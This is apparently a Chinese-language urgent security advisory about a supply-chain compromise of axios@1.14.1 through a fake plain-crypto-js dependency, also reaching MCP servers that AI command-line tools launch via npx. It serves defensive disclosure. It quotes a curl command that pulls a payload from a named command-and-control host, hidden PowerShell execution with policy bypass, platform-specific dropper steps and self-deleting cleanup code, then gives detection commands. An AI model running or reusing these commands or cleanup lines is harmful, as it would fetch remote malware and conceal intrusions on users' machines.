⚠️⚠️⚠️ 紧急通告⚠️⚠️⚠️
各位开发者 特别是Nodejs 使用 axios库的时候 检查下 axios 版本
补充一下 不仅仅是开发人员 使用了AI Cli(例如codex claude code) 并且调用了 open-websearch 等MCP的也要自查
使用 npx 安装的 latest 版本的时候会安装 axios@1.14.1 此版本存在供应链投毒
恶意包 │ plain-crypto-js@4.2.1(伪装 crypto-js)
投毒的 axios │ axios@1.14.1(被篡改,加入了 plain-crypto-js 依赖)
受影响的 MCP │ open-websearch 和 exa-mcp-server 的 npx 缓存
恶意行为 │ 复制 PowerShell 为 wt.exe,执行远程载荷后自删除
攻击行为详解
C2 服务器 : http:/sfrclak.com:8000/6202033
三平台全覆盖的攻击
Windows :
1. where powershell → 找到 powershell.exe 路径
2. 复制 powershell.exe → C:\ProgramData\wt.exe (伪装成 Windows Terminal)
3. 写入 VBS 脚本到 %TEMP%\6202033.vbs:
- 用 curl 从 C2 下载载荷: curl -s -X POST -d "packages.npm.org/product1" "http:/sfrclak.com:8000/6202033"
- 保存为 .ps1 文件
- 用伪装的 wt.exe (实际是 PowerShell) 隐窗执行: -w hidden -ep bypass
- 执行完删除 .ps1
4. 用 cscript 静默执行 VBS,执行完删除 VBS
macOS:
1. curl 从 C2 下载二进制到 /Library/Caches/com.apple.act.mond (伪装成系统进程)
2. chmod 770 赋权
3. 后台执行,连回 C2
4. 通过 osascript (AppleScript) 执行,删除痕迹
Linux:
1. curl 从 C2 下载 Python 脚本到 /tmp/ld.py
2. nohup 后台执行,连回 C2
最后的毁尸灭迹
// 删除 setup.js 自身
fs.unlink(__filename, (x=>{}));
// 把 package.md 重命名为 package.json,覆盖掉含 postinstall 的原始 package.json
fs.rename("package.md", "package.json", (x=>{}));
连 package.json 都替换了,事后检查依赖根本看不出 postinstall 曾经存在过。
快速排查
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"
请检查plain-crypto-js以下内容node_modules:
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"
如果该程序setup.js已经运行,package.json则此目录中的内容将被替换为干净的存根文件。
该目录的存在足以证明投放器已执行。
检查受影响系统上是否存在 RAT 痕迹:
# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"
# Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED":: Windows (cmd.exe)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED
这是一个不到 24 小时前发生的 0-day 供应链攻击(2026-03-31),目前 npm 和安全社区尚未公开披露。
